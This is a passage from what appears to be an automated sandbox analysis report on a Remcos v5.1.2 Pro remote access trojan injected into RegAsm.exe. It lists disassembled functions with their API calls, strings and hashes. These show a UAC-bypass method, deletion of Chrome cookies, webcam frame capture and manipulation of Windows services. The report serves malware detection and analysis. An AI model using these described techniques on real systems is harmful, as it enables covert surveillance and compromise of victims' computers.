                                  • Opcode Fuzzy Hash: b06b8fc2cb4d0c20ff9a3989f2efe758744c2eb59fc0991c33ed663883f7d139
                                  • Instruction Fuzzy Hash: BC215230A40219A6CB14F7F1CC969EE77299F50744F80017FE502B71D1EB7D6945C6DA
                                  Function 00456BD3 Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6348a53403ba44e76667cab5d3d4b8c4f90ca5e92cff7b4211fa09d26e343de5
                                  • Instruction ID: d4e598e7927038c57750db0ba161657e9615562456f8c919f0676739ef068bdb
                                  • Opcode Fuzzy Hash: 6348a53403ba44e76667cab5d3d4b8c4f90ca5e92cff7b4211fa09d26e343de5
                                  • Instruction Fuzzy Hash: 931127B2504214BBEB216F768C05D1F7A5CEB86726B52062EFD55C7292DA3CCC0186A8
                                  Function 00450F7A Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00450CC1: _free.LIBCMT ref: 00450CEA
                                  • _free.LIBCMT ref: 00450FC8
                                    • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                    • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                  • _free.LIBCMT ref: 00450FD3
                                  • _free.LIBCMT ref: 00450FDE
                                  • _free.LIBCMT ref: 00451032
                                  • _free.LIBCMT ref: 0045103D
                                  • _free.LIBCMT ref: 00451048
                                  • _free.LIBCMT ref: 00451053
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _free$ErrorFreeHeapLast
                                  • String ID:
                                  • API String ID: 776569668-0
                                  • Opcode ID: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                  • Instruction ID: 345e916fd15b447c36d88a7a8914fd19e4c3e0710e9d23c2e9f19f8556552687
                                  • Opcode Fuzzy Hash: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                  • Instruction Fuzzy Hash: C111D231402704AAE621BB72CC03FCB779CAF03304F454D2EBEA967153C7ACB4185654
                                  Function 0041119E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                                  Download Yara Rule
                                  APIs
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 004111AB
                                  • int.LIBCPMT ref: 004111BE
                                    • Part of subcall function 0040E0FC: std::_Lockit::_Lockit.LIBCPMT ref: 0040E10D
                                    • Part of subcall function 0040E0FC: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E127
                                  • std::_Facet_Register.LIBCPMT ref: 004111FE
                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00411207
                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00411225
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                  • String ID: (mG
                                  • API String ID: 2536120697-4059303827
                                  • Opcode ID: 4fb09889b2dc78d6b9bc341806ed1c893def47308d87ec9f5bd5aa626124b671
                                  • Instruction ID: b4facbf35e110c19f3eede998f69f9310dce987b63f856d60fe44c7d5fb17b17
                                  • Opcode Fuzzy Hash: 4fb09889b2dc78d6b9bc341806ed1c893def47308d87ec9f5bd5aa626124b671
                                  • Instruction Fuzzy Hash: 42112732900114A7CB14EB9AD8018DEB7699F44364F11456FF904F72E1DB789E45CBC8
                                  Function 0041B354 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 61COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                                    • Part of subcall function 004135E1: RegOpenKeyExA.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 00413605
                                    • Part of subcall function 004135E1: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000400), ref: 00413622
                                    • Part of subcall function 004135E1: RegCloseKey.ADVAPI32(?), ref: 0041362D
                                  • StrToIntA.SHLWAPI(00000000,0046CA08,00000000,00000000,00000000,004750E4,00000003,Exe,00000000,0000000E,00000000,004660CC,00000003,00000000), ref: 0041B3CD
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseCurrentOpenProcessQueryValue
                                  • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                  • API String ID: 1866151309-2070987746
                                  • Opcode ID: 45c7c547461d0a90286b768378f5d74aead19740937584a5a1a9110f100f8656
                                  • Instruction ID: f33cb4008a08c387480eb48f471200dcc92f04aa72c22424ac0a9b44a4c1d04d
                                  • Opcode Fuzzy Hash: 45c7c547461d0a90286b768378f5d74aead19740937584a5a1a9110f100f8656
                                  • Instruction Fuzzy Hash: 8811C47064014926C704B7658C97EFE76198790344F94413BF806A61D3FB6C598683EE
                                  Function 0043A3DA Relevance: 10.6, APIs: 7, Instructions: 60COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • GetLastError.KERNEL32(?,?,0043A3D1,0043933E), ref: 0043A3E8
                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0043A3F6
                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A40F
                                  • SetLastError.KERNEL32(00000000,?,0043A3D1,0043933E), ref: 0043A461
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorLastValue___vcrt_
                                  • String ID:
                                  • API String ID: 3852720340-0
                                  • Opcode ID: f8b088146f32705476b05de113eddff258cc1bfa1c523dc592fb57b9cb9462fc
                                  • Instruction ID: 228fd8bb196f6ae1284969ba5442ea73dc67404c1df350b3d70410c0baad6fb0
                                  • Opcode Fuzzy Hash: f8b088146f32705476b05de113eddff258cc1bfa1c523dc592fb57b9cb9462fc
                                  • Instruction Fuzzy Hash: 87019C322483515EA61027797C8A62B2648EB293B9F30523FF518805F1EF984C90910D
                                  Function 004075EB Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 59COMMON
                                  Download Yara Rule
                                  APIs
                                  • CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe), ref: 0040760B
                                    • Part of subcall function 00407538: _wcslen.LIBCMT ref: 0040755C
                                    • Part of subcall function 00407538: CoGetObject.OLE32(?,00000024,00466528,00000000), ref: 004075BD
                                  • CoUninitialize.OLE32 ref: 00407664
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: InitializeObjectUninitialize_wcslen
                                  • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                                  • API String ID: 3851391207-1839356972
                                  • Opcode ID: d877cea0863f9d3afa12868748af2f8600b5022738d517222c004e226c4c5a05
                                  • Instruction ID: e4e7d1672fbddd81374e29e92f863be8f9bad83f72bb7a306ddb251afa86686e
                                  • Opcode Fuzzy Hash: d877cea0863f9d3afa12868748af2f8600b5022738d517222c004e226c4c5a05
                                  • Instruction Fuzzy Hash: 4501D272B087116BE2246B65DC4AF6B3748DB41B25F11053FF901A62C1EAB9FC0146AB
                                  Function 0040BADC Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040BB18
                                  • GetLastError.KERNEL32 ref: 0040BB22
                                  Strings
                                  • UserProfile, xrefs: 0040BAE8
                                  • [Chrome Cookies not found], xrefs: 0040BB3C
                                  • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040BAE3
                                  • [Chrome Cookies found, cleared!], xrefs: 0040BB48
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: DeleteErrorFileLast
                                  • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                  • API String ID: 2018770650-304995407
                                  • Opcode ID: d4592947abf79dc324386ffcaf4b9b591dee499912662422a1d7ea612805fe04
                                  • Instruction ID: 5dee569c6883bfd73109a670bb68234af0f28e4caad238985ba957b2c74b96e7
                                  • Opcode Fuzzy Hash: d4592947abf79dc324386ffcaf4b9b591dee499912662422a1d7ea612805fe04
                                  • Instruction Fuzzy Hash: 5B01DF71A402055BCA04B7B6CC1B9BE7B24E922704B50017FF502726D6FE3E5D0986CE
                                  Function 0041CE2C Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 48memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • AllocConsole.KERNEL32(00475338), ref: 0041CE35
                                  • ShowWindow.USER32(00000000,00000000), ref: 0041CE4E
                                  • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CE73
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Console$AllocOutputShowWindow
                                  • String ID: Remcos v$5.1.2 Pro$CONOUT$
                                  • API String ID: 2425139147-1584637518
                                  • Opcode ID: bb520a2f19826cc6a1c283625bbcfbf44085728638f029a4a140c4eec348b460
                                  • Instruction ID: 6efa3de70d430de9448838496adf33c47162c0890a3ad1875f095e209401f165
                                  • Opcode Fuzzy Hash: bb520a2f19826cc6a1c283625bbcfbf44085728638f029a4a140c4eec348b460
                                  • Instruction Fuzzy Hash: A90144B1A80304BBD610F7F19C8BF9E77AC9B14B05F500527BA04A70D2EB6DD944466E
                                  Function 004433DA Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,PkGNG,0044338B,00000003,PkGNG,0044332B,00000003,0046E958,0000000C,00443482,00000003,00000002), ref: 004433FA
                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044340D
                                  • FreeLibrary.KERNEL32(00000000,?,?,PkGNG,0044338B,00000003,PkGNG,0044332B,00000003,0046E958,0000000C,00443482,00000003,00000002,00000000,PkGNG), ref: 00443430
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressFreeHandleLibraryModuleProc
                                  • String ID: CorExitProcess$PkGNG$mscoree.dll
                                  • API String ID: 4061214504-213444651
                                  • Opcode ID: ffd65e2a986ef432bd98aae630379cdfc9b477bc787d361fad657d5437817096
                                  • Instruction ID: d7bd46dfab834bb5d48edea7818df211002af85bf4a2e706b61bd78119be3437
                                  • Opcode Fuzzy Hash: ffd65e2a986ef432bd98aae630379cdfc9b477bc787d361fad657d5437817096
                                  • Instruction Fuzzy Hash: 4EF04931900208FBDB159F65DC45B9EBF74EF04753F0040A5F805A2251DB758E40CA99
                                  Function 0041AE51 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 30sleepCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                  • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 0041AE83
                                  • PlaySoundW.WINMM(00000000,00000000), ref: 0041AE91
                                  • Sleep.KERNEL32(00002710), ref: 0041AE98
                                  • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 0041AEA1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: PlaySound$HandleLocalModuleSleepTime
                                  • String ID: Alarm triggered$`#v
                                  • API String ID: 614609389-3049340936
                                  • Opcode ID: fc1dfc3d80636db02bd80d67f349f84282c1adb2487fd06cf6dad27e320cdf65
                                  • Instruction ID: 264e31dd7f8ae4a58c3cd97330858728e5483d82e525179ed11d996d756d41c5
                                  • Opcode Fuzzy Hash: fc1dfc3d80636db02bd80d67f349f84282c1adb2487fd06cf6dad27e320cdf65
                                  • Instruction Fuzzy Hash: 3EE0D826A40220779A10337B6D0FD6F3D29CAC3B2570100BFFA05660C2DD540C01C6FB
                                  Function 0043AB5C Relevance: 9.3, APIs: 6, Instructions: 284COMMON
                                  Download Yara Rule
                                  APIs
                                  • __allrem.LIBCMT ref: 0043ACE9
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD05
                                  • __allrem.LIBCMT ref: 0043AD1C
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD3A
                                  • __allrem.LIBCMT ref: 0043AD51
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD6F
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                  • String ID:
                                  • API String ID: 1992179935-0
                                  • Opcode ID: 3b7debe300bd30616e6d17b60b5e1d5511deed8aaa3e59a787e888dcedb96ab2
                                  • Instruction ID: c7cd181284538591ee8af1586cca3d38175ba7b34bac8e5aa56d350f01832762
                                  • Opcode Fuzzy Hash: 3b7debe300bd30616e6d17b60b5e1d5511deed8aaa3e59a787e888dcedb96ab2
                                  • Instruction Fuzzy Hash: 5F815972A40B05ABE7209F29CC41B6FB3A99F48324F24152FF591D67C1E77CE910875A
                                  Function 00404371 Relevance: 9.2, APIs: 1, Strings: 5, Instructions: 206sleepCOMMON
                                  Download Yara Rule
                                  APIs
                                  • Sleep.KERNEL32(00000000,?), ref: 004044C4
                                    • Part of subcall function 00404607: __EH_prolog.LIBCMT ref: 0040460C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: H_prologSleep
                                  • String ID: CloseCamera$FreeFrame$GetFrame$HNG$OpenCamera
                                  • API String ID: 3469354165-3054508432
                                  • Opcode ID: 157d80eb8e0f3678fafe4a2641bb4748a50a416a1c9fb699c11c746a5f7bd186
                                  • Instruction ID: df1e58e957a7578ae16e417911435538e3341edc64810737793f4aa4f8849b6c
                                  • Opcode Fuzzy Hash: 157d80eb8e0f3678fafe4a2641bb4748a50a416a1c9fb699c11c746a5f7bd186
                                  • Instruction Fuzzy Hash: A751E171A042106BCA14FB369D0A66E3755ABC4748F00443FFA0A676E2DF7D8E45839E
                                  Function 00411D39 Relevance: 9.2, APIs: 6, Instructions: 206memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 004117D7: SetLastError.KERNEL32(0000000D,00411D57,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00411D35), ref: 004117DD
                                  • SetLastError.KERNEL32(000000C1,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00411D35), ref: 00411D72
                                  • GetNativeSystemInfo.KERNEL32(?,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00411D35), ref: 00411DE0
                                  • SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,00000000), ref: 00411E04
                                    • Part of subcall function 00411CDE: VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,00411E22,?,00000000,00003000,00000040,00000000,?,00000000), ref: 00411CEE
                                  • GetProcessHeap.KERNEL32(00000008,00000040,?,?,?,?,00000000), ref: 00411E4B
                                  • HeapAlloc.KERNEL32(00000000,?,?,?,?,00000000), ref: 00411E52
                                  • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00411F65
                                    • Part of subcall function 004120B2: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F72,?,?,?,?,00000000), ref: 00412122
                                    • Part of subcall function 004120B2: HeapFree.KERNEL32(00000000,?,?,?,?,00000000), ref: 00412129
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
                                  • String ID:
                                  • API String ID: 3950776272-0
                                  • Opcode ID: 0997a6c101f2dd0e8850336bac1793923a5345a50e97098554ef69f44a303648
                                  • Instruction ID: da58ab861bd0a84ec3871346ef31e8b8814b9d9500880b3a3e1890ad13292c25
                                  • Opcode Fuzzy Hash: 0997a6c101f2dd0e8850336bac1793923a5345a50e97098554ef69f44a303648
                                  • Instruction Fuzzy Hash: F761A270700611ABCB209F66C981BAA7BA5AF44704F14411AFF05877A2D77CE8C2CBD9
                                  Function 0044597A Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: __cftoe
                                  • String ID:
                                  • API String ID: 4189289331-0
                                  • Opcode ID: dfe269b3e7c89c95b27fedd159a696e88b5656ec827068c0169833f59e794ee9
                                  • Instruction ID: b93b8478136607885b926496a305f1bfb884a7f6acf724e610c81469f19cb9e5
                                  • Opcode Fuzzy Hash: dfe269b3e7c89c95b27fedd159a696e88b5656ec827068c0169833f59e794ee9
                                  • Instruction Fuzzy Hash: 2551FD72500605ABFF209B598C81EAF77A8EF45334F25421FF915A6293DB3DD900C66D
                                  Function 0041AD09 Relevance: 9.1, APIs: 6, Instructions: 67serviceCOMMON
                                  Download Yara Rule
                                  APIs
                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,0041A41F,00000000), ref: 0041AD19
                                  • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,0041A41F,00000000), ref: 0041AD2D
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD3A
                                  • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0041A41F,00000000), ref: 0041AD6F
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD81
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD84
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                  • String ID:
                                  • API String ID: 493672254-0
                                  • Opcode ID: f3d4b447748c037b2dac55463b57a149c398f0d820f611c96b244fdc7ed94624
                                  • Instruction ID: 77e668261cf9ee2bd18e5a0e87596c089765e66a1be6d3c981f75cbf7ed2a716
                                  • Opcode Fuzzy Hash: f3d4b447748c037b2dac55463b57a149c398f0d820f611c96b244fdc7ed94624
                                  • Instruction Fuzzy Hash: A7016D311462157AD6111B34AC4EFFB3B6CDB02772F10032BF625965D1DA68CE8195AB
                                  Function 0044A084 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 305COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: __alldvrm$_strrchr
                                  • String ID: PkGNG
                                  • API String ID: 1036877536-263838557
                                  • Opcode ID: 8f78adc186be73fa66820e99e070c83f6be0ee509df7c4dfd67e0dde8c439993
                                  • Instruction ID: 8ce1af842cd152cb2b2428f5d584a25f6c9224aafe101b92c03b71ca88d34985
                                  • Opcode Fuzzy Hash: 8f78adc186be73fa66820e99e070c83f6be0ee509df7c4dfd67e0dde8c439993
                                  • Instruction Fuzzy Hash: 87A156729846829FF721CF58C8817AEBBA5FF15314F2841AFE8859B381D27C8C51C75A
                                  Function 00448295 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • GetLastError.KERNEL32(?,0043F770,0043A875,0043F770,00474EF8,PkGNG,0043CE65,FF8BC35D,00474EF8,00474EF8), ref: 00448299
                                  • _free.LIBCMT ref: 004482CC
                                  • _free.LIBCMT ref: 004482F4
                                  • SetLastError.KERNEL32(00000000,?,?,00000000), ref: 00448301
                                  • SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044830D
                                  • _abort.LIBCMT ref: 00448313
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorLast$_free$_abort
                                  • String ID:
                                  • API String ID: 3160817290-0
                                  • Opcode ID: c2591106eec843b6d6e807480f59c56eb64d59fc50806e925db96e87570db6c2
                                  • Instruction ID: 8d34d3ffa9a8a5ca7629c839d325bdddc3ef58a145117f7ac1d0225592351e3a
                                  • Opcode Fuzzy Hash: c2591106eec843b6d6e807480f59c56eb64d59fc50806e925db96e87570db6c2
                                  • Instruction Fuzzy Hash: 8EF0A435101B006BF611772A6C06B6F26599BD3B69F36042FFD18962D2EF6DCC42816D
                                  Function 0041AB37 Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                                  Download Yara Rule
                                  APIs
                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB46
                                  • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB5A
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB67
                                  • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB76
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB88
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB8B
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Service$CloseHandle$Open$ControlManager
                                  • String ID:
                                  • API String ID: 221034970-0
                                  • Opcode ID: bc8933c3fd8e2fa998b2246ab8c72ed9b0f5170f60f0245b371609b51ac54b8f
                                  • Instruction ID: 443f58cffa4f299642b313368f914f767bd977a6fac550f0ec2f38f013616b5a
                                  • Opcode Fuzzy Hash: bc8933c3fd8e2fa998b2246ab8c72ed9b0f5170f60f0245b371609b51ac54b8f
                                  • Instruction Fuzzy Hash: E4F0F631541318BBD7116F259C49DFF3B6CDB45B62F000026FE0992192EB68DD4595F9
                                  Function 0041AC3B Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                                  Download Yara Rule
                                  APIs
                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC4A
                                  • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC5E
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC6B
                                  • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC7A
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC8C
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC8F
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Service$CloseHandle$Open$ControlManager
                                  • String ID:
                                  • API String ID: 221034970-0
                                  • Opcode ID: 94d93926ec858c5890fc603d54741d931e0eaafa3f6b468ff921a10e10d86c77
                                  • Instruction ID: 80b71cf000cc834045a6d48b23744411b71cc7e49355023a2f572df053a73ec4
                                  • Opcode Fuzzy Hash: 94d93926ec858c5890fc603d54741d931e0eaafa3f6b468ff921a10e10d86c77
                                  • Instruction Fuzzy Hash: 73F0C231501218ABD611AF65AC4AEFF3B6CDB45B62F00002AFE0992192EB38CD4595E9
                                  Function 0041ACA2 Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                                  Download Yara Rule
                                  APIs
                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACB1
                                  • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACC5
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACD2
                                  • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACE1
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACF3
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACF6
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Service$CloseHandle$Open$ControlManager
                                  • String ID:
                                  • API String ID: 221034970-0
